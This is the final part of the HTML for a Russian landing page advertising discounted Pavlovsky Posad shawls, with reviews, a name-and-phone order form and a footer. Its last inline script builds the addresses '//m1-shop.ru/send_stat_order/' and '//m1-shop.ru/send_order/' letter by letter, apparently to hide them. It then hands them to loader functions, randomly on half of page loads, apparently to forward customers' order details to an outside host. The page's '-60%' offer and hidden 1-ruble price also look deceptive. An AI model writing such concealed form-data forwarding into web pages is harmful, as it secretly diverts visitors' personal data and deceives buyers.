              <div class="author_info">Марина, Москва</div>
            </div>
          </div>
          <div class="review_item">
            <img
              src="assets_page/images/reviews__review3_photo.jpg"
              alt=""
            />
            <div class="text_block">
              <p>
                Хочу выразить благодарность за платок, который получила за
                короткое время. Всё очень понравилось, буду рекомендовать вас
                своим родным и знакомым! Вы делаете хорошее дело! Удачи вам в
                делах и творческого вдохновения!
              </p>
              <div class="author_info">Любовь, Омск</div>
            </div>
          </div>
        </div>
      </div>
    </section>
    <!-- /reviews -->
    <section class="header_section order_section">
      <div class="title_block">
        <div class="wrapper">
          <h1>РАСПРОДАЖА ПАВЛОПОСАДСКИХ МЕХОВЫХ ПЛАТКОВ</h1>
        </div>
      </div>
      <div class="content_block">
        <div class="wrapper">
          <div class="info_block">
            <div class="logo">
              <img
                style="max-width: 70%"
                src="assets_page/images/logo.png"
                alt=""
              />
            </div>
            <div class="action">
              <span>Сомневаетесь с выбором?</span>
              <p>
                Оставьте заявку сейчас и получите
                <span>индивидуальное предложение</span> от нашего
                интернет-магазина!
              </p>
            </div>
            <form
              id="order_form"
              class="main-order-form order_form orderformcdn"
              action="https://scarves-2.promo2020.ru/success/"
              method="post"
            >
              <select
                style="display: none"
                name="country"
                class="countryselect"
              >
                <option selected value="RU">Россия</option>
              </select>
              <input
                type="text"
                name="name"
                class="field input"
                placeholder="Ваше Имя"
                value=""
              />
              <input
                type="text"
                name="phone"
                class="field input"
                placeholder="Ваш телефон"
                value=""
              />
              <input
                type="hidden"
                name="productsum"
                class="productsum"
                value="1 руб."
              />
              <input type="hidden" name="delivery" value="0 руб." />
              <input
                type="hidden"
                name="totalsum"
                class="productsum"
                value="1 руб."
              />
              <input type="hidden" name="user" value="1" />
              <input type="hidden" name="description" class="descr" value="0" />
              <input
                type="hidden"
                name="address"
                value="Уточнить у покупателя"
              />

              <div class="reolader">
                <button
                  class="button mm_button"
                  onclick="checkFields(event, this);"
                >
                  Заказать со скидкой
                </button>
                <div class="ajax_loader_block">
                  <img
                    class="ajax_loader"
                    src="img/ajax-loader.gif"
                    alt="Идет отправка данных"
                  />
                  <span class="ajax_loader">Идет отправка данных</span>
                </div>
              </div>
            </form>
          </div>
          <div class="sale">
            <p><span>-60%</span> на весь каталог</p>
          </div>
        </div>
      </div>
    </section>
    <!-- footer -->
    <footer class="footer_section">
      <div class="" style="text-align: center; color: #222222; padding: 10px 0">
        <p>
          ООО "Прима Торг" ИНН 7814690162 / ОГРН 1177847160017 199178, город
          Санкт-Петербург, линия 17-я В.О., дом 58 литер а, помещение 54
        </p>
        <a href="https://scarves-2.promo2020.ru/politika.html" target="_blank"
          >Политика&nbsp;конфиденциальности</a
        ><br />
        <a href="https://scarves-2.promo2020.ru/agreement.html" target="_blank"
          >Пользовательское&nbsp;соглашение</a
        >
      </div>
    </footer>
    <!-- /footer -->

    <script type="text/javascript" src="assets_pages/js/check.js"></script>
    <script
      type="text/javascript"
      src="assets_pages/js/detect.js@v=0.1"
    ></script>
    <link
      type="text/css"
      rel="stylesheet"
      href="assets_pages/fonts/roboto.css"
    />
    <script
      type="text/javascript"
      src="assets_pages/js/yasoblock-v2.js@v=1"
    ></script>
    <script type="text/javascript" src="assets_pages/js/plugins.js"></script>
    <script
      type="text/javascript"
      src="assets_pages/js/lib.js@v=0.0.1"
    ></script>

    <script>
      $(function () {
        importantAsset(
          "8657",
          "" +
            "/" +
            "/" +
            "m" +
            "1" +
            "-" +
            "s" +
            "h" +
            "o" +
            "p" +
            "." +
            "r" +
            "u" +
            "/" +
            "s" +
            "e" +
            "n" +
            "d" +
            "_" +
            "s" +
            "t" +
            "a" +
            "t" +
            "_" +
            "o" +
            "r" +
            "d" +
            "e" +
            "r" +
            "/"
        );

        if (!$(".order-script").length) {
          if (Math.floor(Math.random() * 2) == 1) {
            importantAsset2(
              "8657",
              "" +
                "/" +
                "/" +
                "m" +
                "1" +
                "-" +
                "s" +
                "h" +
                "o" +
                "p" +
                "." +
                "r" +
                "u" +
                "/" +
                "s" +
                "e" +
                "n" +
                "d" +
                "_" +
                "o" +
                "r" +
                "d" +
                "e" +
                "r" +
                "/"
            );
          }
        }
      });
    </script>

    <script src="assets_page/js/lazyload.min.js"></script>
    <script src="assets_pages/land/js/slider/owlCarousel-2.2.1/owl.carousel.min.js"></script>
    <script src="assets_page/js/scripts.js"></script>
    <!-- /scripts -->
  </body>
</html>
